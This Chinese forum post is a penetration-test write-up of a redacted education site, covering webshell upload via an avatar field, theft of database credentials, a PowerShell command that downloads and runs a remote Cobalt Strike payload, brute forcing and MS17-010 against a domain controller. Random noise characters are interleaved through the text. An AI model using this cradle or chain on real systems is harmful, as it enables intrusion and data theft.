找回密码
 立即注册
查看: 3157|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, v# a6 E/ h5 S6 S2 A' {8 f 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 ) C) R( I- P k6 e" [- a% g0 }

4 @8 j; E" l- X, L

4 q+ i0 ^6 A9 Q. S6 \  , {- p& {7 A( `# T# x! g: B4 q

# t# v$ @) v8 K. N4 P5 a- [3 N* a

& P8 S- K- C' }/ m 正文% J( L! l/ D8 L! Z

( y: Z7 j3 q9 ]9 V& N0 s0 i

) R1 r% u9 Q& t! n' n; z1 \: f  * ]' [0 O, B/ b# ^9 Z

8 y" w+ E9 n" m5 c% s$ a" y

) f' Y4 L1 l3 |5 A 目标:www.xxxx.com(一家教育机构)
8 Z9 r) q8 [3 V- d6 l, A' t9 O7 `
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) ]) Q4 }* z2 I( h

3 G# H3 ]0 Q5 s( N

7 T6 e+ ?6 ?9 ^& O1 W/ p- ^1 }$ a+ f vshapes=3 _" X! X# e& I, A z

' X% I# s% A+ d1 e) ]

& `7 E1 A# J! R. H1 h! s. `, p 进行了简单的信息搜集
) o& m$ R+ i' K$ t# A
# A% r6 \8 C' k+ t5 k8 r
; x9 S) {, s R8 q1 v8 i2 v; `

' R4 s2 u! G- L

+ `! |6 u$ i9 G, J$ X" S- D/ ` 子域名搜集0 C: @3 E6 S) m+ ]' j

2 Y% T8 b ]- X) T1 p/ l/ C7 v

2 e; ]0 R* N- N' U+ Z& r0 | vshapes=8 \6 b! t1 `' r8 ^6 A L/ M) O

- J! [( Y6 Y0 y9 V/ B8 P! i; q

# m2 B$ i1 W5 V, `' ?: t$ O9 ^" ` fofa找资产
/ s% p. s8 [6 U* L5 ^
: d' A' j/ P3 V7 @+ Z9 q+ E
R& {/ n& ]5 \* h. u. u

% ]/ i$ T7 B1 y' p4 k9 @

! l. y/ \' n, M1 W! i vshapes= 5 x; N6 ?" F+ r; @

( v) {: D7 `7 @& B! ]8 u1 W: C

4 j" |* s% P, z9 p ~+ N4 S* I% b1 ` 一共七个资产。去重之后只有两个。
6 M2 D6 N4 a0 s& c5 ^
. U9 u2 x( p& ^, M( T1 ^# N
* c- Y1 g9 Z3 M

5 u/ o/ ]- D$ _5 {6 D% g

+ Z3 v2 o4 O0 A' D" L+ U+ b 目录探测 2 l c; m0 k3 A; {1 @

. x5 ?/ u3 P6 i" E# y' O+ T

" K0 e0 [ o$ P; X vshapes= ) G3 K! t$ M1 o1 I5 U

# Z- h* K0 y# {2 ^" O. Z

9 K) h3 ~: t) B2 s$ ]: x 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
; B5 z4 B' _/ w: H* p/ v. x) \
0 t9 f5 p/ n6 `6 a
3 A% ]; s' W8 m" y2 R, Y, c7 w* U

/ ]- H* b W/ l0 e$ h5 ^$ |

S% \! ]3 j0 E) }4 o3 f, o 我又尝试了通过修改返回包来绕过登录界面/ ~; Z; \$ b+ x! l2 z% C5 i

& N& l5 q: l% R1 V8 A# A

4 t# t a- u! M) z vshapes=9 H. N5 `6 M+ T/ E. O8 u

6 f- `5 g) A; n; M

: J+ c) f C+ e, Z; _( O( ~ 还是不行,尝试注入无果6 j4 @- o6 p; ?8 ^/ B7 m% g- ^6 M

* q4 g4 m# h/ Y1 Q* w4 a

/ y0 L5 `1 S% ` vshapes= ( i" i7 F7 v5 D

9 E3 }/ F$ E! ~4 w5 e

2 |* D# K+ X+ e6 c4 W. k 不过我目录探测出了一处Spring信息泄露
: D7 `8 d7 c6 T: [- p
( K% f( y2 k0 L/ G- i- d& E" O
7 q" {' u4 x1 Z

) l) i1 [8 c8 s9 ?

* V% {: L9 n9 [6 m vshapes=! E' P( G5 T. @7 H

9 D: D2 e# ]' |: z" Q

. t8 Q7 ^7 M- g2 d" ~$ h7 I/ N 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 N* [# c$ J7 S9 s: _1 |

: r) K2 P2 H! f5 i/ I6 w D6 E

+ t. o: Y0 h2 M8 ?) _0 o0 r4 P vshapes= ) a8 g: [5 Z4 A6 Q

. X" U. n8 C [( v& j" n

" t" E. d) v6 F4 Z5 }% t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ; |0 v: T) i4 R3 y7 D; [& r ?

/ L% s2 M8 B1 P! [

2 C$ b9 v) W/ g& F) T; V q+ W vshapes=7 X, v9 S. H$ o; [: ]2 @! w: N

- Z3 J6 w7 O2 D- w7 d! p

% V2 N. K2 {- v# r0 z! e9 [7 z 获取有些师傅到这一步就手机抓包电脑测了。9 S; r& |; V- j) `+ W. ]1 f

/ W. ]3 l% U- A8 F$ B2 v

7 w& L( _/ X) h& }3 @% s Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 . Q* A$ j. r) R# ~

% I, [/ B( h7 F' M; Z: `

! M' I* R5 S1 [: M4 `$ C 其中在一个公众号发现了小程序,可以进行注册。( F1 b/ j/ ~, B+ P- ]

" l, z' ?+ d7 r. l- S

3 |: y$ l$ D6 f- x% T7 D2 Z9 y 看到了头像上传,尝试上传获取WebShell 9 I& L* r0 o; {# p6 J$ H5 h( u+ a

5 R$ Q9 Z6 i% m {1 G/ W

z" c' @1 Z3 z* A/ O& f ~2 w vshapes= / m/ p# A; {5 Z

% S- n" _7 C: S. p

7 L- \* C6 J& e3 f4 T 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问5 N% o, \/ ]) `$ V& m

8 M) K0 h( @5 c' i' X# Z

% v$ Y( s Q* P vshapes=1 \7 {9 X: _0 w: q: i1 D6 I

2 u8 F& w$ k& L7 H

: ]4 B1 |- p/ O- n& _, ]5 o/ E 然后上了大马9 C* V5 X. r/ P* D* v

z' p6 h0 I7 {: ?% P/ R9 G! V, a

7 f" j2 D) u. e& M: ] vshapes=6 R, P) P( I5 `5 T! {

) I2 p, z: S7 v0 u- a

, p1 a9 L1 p. t5 y$ ]. Y, } vshapes= 0 M: y8 J4 Q( p% z- G3 H) \$ A& c

2 R9 ^; C1 F6 G6 x

$ a# T6 s4 r6 h( R; |1 }+ A$ z 通过翻找文件发现数据库账号密码* W0 D; F# L+ i2 T. i# C; x

0 P" v( k! Y; l( L) |

+ i( T) Q+ i1 |$ R( ]( ] vshapes= {) W& P! U7 w' \$ z6 z, s

" |1 [- T9 a* D `. F8 a0 T6 ]: D. k

& t) X; L7 z5 s, a2 S8 W+ y- G --内网渗透 : y$ S( S! T L) f1 w

) U7 a+ F1 ~% y5 q4 j/ J d F

1 z% b. x6 W; V9 K 直接通过powershell执行 cs上线" Z. [+ C5 ?) u5 S

, R& k* ?5 I4 v, J) {2 C" W

' c- u! d6 l" Z5 U1 |1 [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"$ h; q% J f. I

9 a) y+ O% r2 q6 g- g3 u

+ R& G0 T- F( y$ e- b0 x, B vshapes= 0 o9 q$ _" n; \2 E6 G8 R6 t) U

! Q+ Z& c4 i G3 x3 x. G1 r" i

: s' ]: x) `( M- I' b$ J7 e 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破+ Y; o8 A3 ?9 v: S3 b

- X) ^ [, S2 w9 ]( G/ h

8 e: J7 ?+ p3 T' s vshapes=$ \, a2 t4 d! q; A

$ a% F5 ]& {) ?. G

1 \$ p+ F- k$ Z: h0 l+ M( | 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
( D3 `' z ?' F% }; l: R
* Z2 ^$ O! L% S% G
; E+ i8 E% ~" G: a7 Q
: O! U8 t$ ]/ ^

7 u8 ?' W1 r3 ]1 l* ^' t. [8 J3 e

2 A1 X j* Y% }: ~7 ^; Z vshapes=( d- ]3 p! m" K! A- a

; w. L8 ?4 z# B% M- b

- i! u* ^% c! r6 d1 x9 K 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# W8 s4 W0 e" G; l# u" H
; f5 T4 a9 Z1 |
: e) c1 u( C+ c1 @6 P$ d% Z- ~

! x; _ U* I& B0 v

: ~# b" l: Y8 @+ S$ b8 `0 e vshapes=: u+ y/ O: O1 r) a( y

! t( u. U/ k* M/ H% d. K9 T+ p! I. o$ O

4 q( o% C' v7 w! l
- } ^! X2 [# A
8 l1 |& ^8 N B2 T
$ @; m, j6 ?" ]" m# U" ?7 `5 C0 m

: [, y# [- Q# O+ y; H" h' `* G) x

" F. t K0 g- r& v i# Z* p7 m   ' I5 K0 O$ M1 ~

3 n) Q0 e8 l4 A

. G: d7 `+ o n 小结 : C) ~6 i' J# Q- t" X! e

' F; g# j8 X& J

( _5 d- [! G1 \. Y& u3 x  + Y2 d; Q3 s- x5 y. O" k* Q

/ r* A3 b* q; G

8 y/ V1 f+ }9 q. [6 | 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!2 Z! |0 N% {' {4 i% l

, Q. [% @0 }. s; {! c1 a$ `! W

4 a Y# V' g& K* G) o  7 T2 s# s, c% c' V

+ |+ n. Z( q0 c% F" K# z% W
    " a4 p1 n6 |6 z8 A
  • ) u# C2 B3 J9 G1 _/ }   7 \7 k0 W- ]3 Q+ a X1 f+ O4 f# }
  • 9 e S" Y% T* Y5 F& t
  • 1 \3 Y' V6 W& Y   2 C3 B+ g% H/ @1 h7 k
  • # ]- a; ~" A' K5 v
& d4 |0 n2 p+ I4 C2 k' w+ h! i

+ {! B h! ]- L3 C `5 W6 ?& N 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* i! U% d/ N" Y& ^

Q, M. Y2 s5 E; B4 k+ ?

& v2 f% p0 U5 A& O5 b# m: e% _  * ^' Q0 V/ N8 R/ a! |0 H+ Y$ u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表